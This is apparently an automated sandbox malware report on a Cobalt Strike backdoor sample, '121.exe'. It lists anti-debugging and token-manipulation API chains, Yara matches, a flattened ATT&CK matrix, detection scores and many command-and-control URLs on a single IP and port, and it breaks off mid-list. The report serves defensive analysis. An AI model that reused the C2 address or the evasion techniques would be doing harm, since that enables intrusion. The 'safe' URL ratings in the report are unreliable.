              Source: 121.exe, 00000000.00000003.2941581497.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3270332274.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2155147374.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2820180707.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3417364243.0000000000106000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.0000000000106000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\121.exeAPI call chain: ExitProcess graph end nodegraph_0-37560

              Anti Debugging

              barindex
              Found API chain indicative of debugger detection
              Source: C:\Users\user\Desktop\121.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-37224
              Found potential dummy code loops (likely to delay analysis)
              Source: C:\Users\user\Desktop\121.exeProcess Stats: CPU usage > 42% for more than 60s
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,0_2_00D0F810
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D09744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D09744
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CED83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00CED83C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D0C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock,0_2_00D0C0C8
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00402F62 SetUnhandledExceptionFilter,0_2_00402F62
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_004542E4 SetUnhandledExceptionFilter,TlsGetValue,0_2_004542E4
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D044D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D044D0
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00D124F0 SetUnhandledExceptionFilter,0_2_00D124F0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CFDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_00CFDF50
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CFDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00CFDEC8
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00454244 CreateThread,GetSystemTimeAsFileTime,0_2_00454244
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00CF5E28
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00CF5E28
              Source: C:\Users\user\Desktop\121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Remote Access Functionality

              barindex
              Yara detected CobaltStrike
              Source: Yara matchFile source: Process Memory Space: 121.exe PID: 5000, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.121.exe.a30000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.121.exe.a30000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0.2.121.exe.ce0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.121.exe.ce0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF6A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00CF6A78
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CFEE8C socket,closesocket,htons,bind,listen,0_2_00CFEE8C
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CF6670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00CF6670

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		2
              Native API              		2
              Valid Accounts              		2
              Valid Accounts              		2
              Valid Accounts              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		21
              Access Token Manipulation              		212
              Virtualization/Sandbox Evasion              		LSASS Memory341
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Process Injection              		21
              Access Token Manipulation              		Security Account Manager212
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		1
              Process Injection              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Account Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              File and Directory Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
              System Information Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              121.exe87%ReversingLabsWin64.Backdoor.CobaltStrike
              121.exe100%AviraHEUR/AGEN.1344321
              121.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://152.42.226.16:60421/cald0%Avira URL Cloudsafe
              https://152.42.226.16/80%Avira URL Cloudsafe
              https://152.42.226.16:60421/a0%Avira URL Cloudsafe
              https://152.42.226.16:60421/capd0%Avira URL Cloudsafe
              https://152.42.226.16:60421/caM0%Avira URL Cloudsafe
              152.42.226.160%Avira URL Cloudsafe
              https://152.42.226.16:60421/cavcsOdb0%Avira URL Cloudsafe
              https://152.42.226.16:60421/T0%Avira URL Cloudsafe
              https://152.42.226.16:60421/V0%Avira URL Cloudsafe
              https://152.42.226.16:60421/ca0%Avira URL Cloudsafe
              https://152.42.226.16:60421/cafa.dM0%Avira URL Cloudsafe
              https://152.42.226.16:60421/k0%Avira URL Cloudsafe
              https://152.42.226.16:60421/cax0%Avira URL Cloudsafe
              https://152.42.226.16:60421/WNIt0%Avira URL Cloudsafe
              https://152.42.226.16:60421/ca80%Avira URL Cloudsafe
              https://152.42.226.16:60421/cagK0%Avira URL Cloudsafe
              https://152.42.226.16:60421/?r0%Avira URL Cloudsafe
              https://152.42.226.16:60421/-0%Avira URL Cloudsafe
              https://152.42.226.16:60421/ca2dY0%Avira URL Cloudsafe
              https://152.42.226.16:60421/b0%Avira URL Cloudsafe
              https://152.42.226.16:60421/cap0%Avira URL Cloudsafe
              https://152.42.226.16:60421/car0%Avira URL Cloudsafe
              https://152.42.226.16:60421/0%Avira URL Cloudsafe
              https://152.42.226.16:60421/cagd0%Avira URL Cloudsafe
              https://152.42.226.16:60421/20%Avira URL Cloudsafe
              https://152.42.226.16:60421/caTd0%Avira URL Cloudsafe
              https://152.42.226.16:60421/cab0%Avira URL Cloudsafe
              https://152.42.226.16:60421/caJda0%Avira URL Cloudsafe
              http://127.0.0.1:%u/0%Avira URL Cloudsafe
              https://152.42.226.16:60421/cavd0%Avira URL Cloudsafe
              https://152.42.226.16:60421/226.16:60421/0%Avira URL Cloudsafe
              https://152.42.226.16:60421/caEdh0%Avira URL Cloudsafe
              https://152.42.226.16:60421/caIdd0%Avira URL Cloudsafe
              https://152.42.226.16/0%Avira URL Cloudsafe
              https://152.42.226.16:60421/caOdb0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              152.42.226.16true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://152.42.226.16/8121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/caM121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/a121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cald121.exe, 00000000.00000003.4130796318.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/V121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/capd121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2820180707.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2156494637.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2126844172.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2155147374.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2792190012.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/T121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/ca121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cavcsOdb121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cafa.dM121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/WNIt121.exe, 00000000.00000003.2126844172.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/ca8121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4014515237.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2334091700.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cax121.exe, 00000000.00000003.3835071770.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2519144542.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2455534442.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/k121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/-121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/ca2dY121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3540285999.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3599182783.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3509521159.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cagK121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/?r121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/b121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cap121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3893306724.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3270332274.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3062381181.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2821596006.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3479245632.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2882630735.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2697480697.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2850541886.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3300306811.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3298309211.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4366341910.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2880742433.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2943712531.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3210323568.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.0000000000127000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3449261664.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/car121.exe, 00000000.00000003.3092041130.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3002324860.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3122009496.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3000783488.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cagd121.exe, 00000000.00000003.2364494903.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2393839164.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2726578993.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2759574404.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/2121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2576279859.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2694595334.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/caTd121.exe, 00000000.00000003.3210323568.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3241004912.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cab121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/cavd121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3389400003.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3417364243.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3419421492.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3360034969.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://152.42.226.16:60421/caX121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://152.42.226.16:60421/caJda121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3181156239.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://127.0.0.1:%u/121.exe, 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://152.42.226.16:60421/226.16:60421/121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2274708587.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2272990691.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 